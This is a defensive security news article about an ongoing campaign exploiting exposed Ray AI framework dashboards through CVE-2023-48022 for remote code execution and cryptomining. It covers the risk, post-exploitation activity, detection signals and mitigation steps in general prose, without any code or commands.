Ray AI Framework Vulnerability Exploited In Two-Year-Old Security Campaign

1

The Ray AI framework vulnerability is under active exploitation in a long running campaign that targets exposed clusters for remote code execution and crypto mining. Researchers report persistent abuse of the Ray dashboard component and related APIs, with activity stretching across roughly two years.

Many Ray deployments still sit open on the public internet, which enables unauthorized code execution and follow on compromise.

Security teams should immediately assess exposure, restrict network access, and enforce authentication on all Ray components. The campaign shows how fast adversaries pivot to AI infrastructure when management endpoints are reachable.

Maintainers have issued guidance for secure Ray deployments, yet risk remains elevated due to weak isolation, missing TLS, and unchecked internet access to dashboards.

Ray AI framework vulnerability: What You Need to Know

• Attackers abuse exposed Ray dashboards for remote code execution, so limit exposure, patch, and harden clusters now.

Ray AI framework vulnerability

SecurityWeek reports continued targeting of internet exposed Ray clusters through the dashboard and its APIs.

The activity aligns with CVE-2023-48022 and allows adversaries to trigger jobs or execute commands on reachable nodes.

This Ray AI framework vulnerability remains widespread because many clusters lack network isolation, authentication, and transport security.

The Ray project advises running clusters on trusted networks with proper access controls, yet exposed endpoints keep risk high.

For engineering and MLOps teams, the Ray AI framework vulnerability underscores that AI infrastructure needs the same segmentation, least privilege, and monitoring as any production service.

CVE-2023-48022 Ray dashboard exploit: how it works

The CVE-2023-48022 Ray dashboard exploit hinges on unauthenticated or weakly protected endpoints that accept operations leading to job creation and command execution.

When the dashboard is internet reachable, attackers can achieve Ray AI framework remote code execution, deploy scripts, and pivot laterally across the environment.

Recommended actions include restricting access, applying updates, enabling TLS, and following secure deployment practices.

References: the NVD entry for CVE-2023-48022 and the Ray Security Policy.

Who is at risk from this Ray AI framework vulnerability

Organizations using Ray for distributed training, model serving, or data processing face elevated risk if clusters are internet reachable. Commonly affected environments include:

• Cloud hosted Ray clusters with public IPs or permissive security groups
• On premises clusters running default settings without network segmentation
• Dev and test environments left open for convenience and never hardened

The Ray AI framework vulnerability intersects with broader AI security concerns, including supply chain exposure and service misconfiguration.

For related context, see coverage of threat actors exploiting cloud AI services and recent framework level flaws that impact AI workloads.

What attackers do after access

Once inside, adversaries typically leverage the Ray AI framework vulnerability to run scripts that achieve the following results:

• Fetch and launch cryptocurrency miners along with persistence mechanisms
• Enumerate environment variables, credentials, and attached storage
• Scan for additional reachable services to support lateral movement
• Disable or evade monitoring and consume CPU or GPU cycles for profit

These tactics mirror other threats to AI adjacent systems and raise risks of data exposure, model theft, and resource hijacking.

Research into prompt injection in AI systems shows how quickly attack surfaces evolve around ML stacks.

Detection and response guidance

To identify an active compromise linked to the Ray AI framework vulnerability, review the following signals:

• Ray dashboard and job submission logs for unfamiliar accounts or source IPs
• Process lists and cron or systemd entries for unexpected miners and scripts
• Outbound connections to mining pools or other suspicious hosts
• Cloud metrics for abnormal CPU or GPU consumption and egress spikes

If indicators are present, isolate the cluster, rotate credentials, rebuild nodes from trusted images, and re provision with hardened settings.

Mitigation steps for the Ray AI framework vulnerability

Defenders can reduce risk with layered controls that close the initial entry points and limit blast radius:

• Restrict dashboard and API access to trusted networks using firewalls, VPC rules, and private endpoints
• Enable TLS, update to the latest Ray releases, and follow guidance from project maintainers
• Place clusters behind identity aware proxies and require authentication for administrative operations
• Continuously scan for exposed services and misconfigurations across cloud and data centers

Treat the Ray AI framework vulnerability as a high impact exposure that demands minimized attack surface, strong authentication, and continuous monitoring.

Implications for AI and MLOps Teams

Addressing the Ray AI framework vulnerability now strengthens the ML platform, reduces compute theft from illicit mining, and demonstrates operational due diligence.

Gains include improved configuration hygiene, safer secrets handling, and faster patch cadence, which benefit related services and data pipelines.

Teams may face short term friction as they rework network access, add authentication gateways, and retrain staff. Limited downtime can occur when moving clusters to private networks and rebuilding hosts to remove persistence.

These investments reduce long term incident risk and resource costs.

Conclusion

The campaign abusing the Ray AI framework vulnerability shows how quickly AI infrastructure becomes a high value target once dashboards are exposed. Two years of activity signals urgent risk reduction.

Prioritize isolation of Ray dashboards, require authentication for administrative actions, and keep clusters updated. Pair configuration hardening with continuous monitoring and practiced incident response.

Engage security and MLOps teams together. Treat AI services like any internet facing application, and use the Ray AI framework vulnerability as a catalyst for durable improvements.

Questions Worth Answering

What is being exploited in Ray?

Attackers target the Ray dashboard and APIs to trigger jobs and run commands remotely, which enables unauthorized access and execution.

What is CVE-2023-48022?

This CVE involves the Ray dashboard and can allow remote code execution when the service is exposed and lacks sufficient protection.

How long has the campaign been active?

Researchers report about two years of continued exploitation focused on exposed Ray endpoints across cloud and on premises environments.

What should I do immediately?

Remove public exposure, enforce network controls, enable authentication, update Ray, and inspect logs and systems for compromise indicators.

What are common post exploitation actions?

Cryptocurrency mining, persistence via scheduled tasks, discovery of credentials and storage, and lateral movement to adjacent services.

Where can I learn more about securing AI systems?

Review the Ray Security Policy and industry research on prompt injection and model service hardening.

Is there a named exploit for this issue?

Yes, the CVE-2023-48022 Ray dashboard exploit enables Ray AI framework remote code execution when endpoints are reachable without strong controls.

About Ray Project

Ray is an open source framework for distributed computing that scales Python workloads and AI training across clusters.

It provides tools for parallel processing, orchestration, and autoscaling to use CPUs and GPUs efficiently for ML pipelines.

Anyscale stewards the project with a broad community focused on performance, reliability, and secure operations.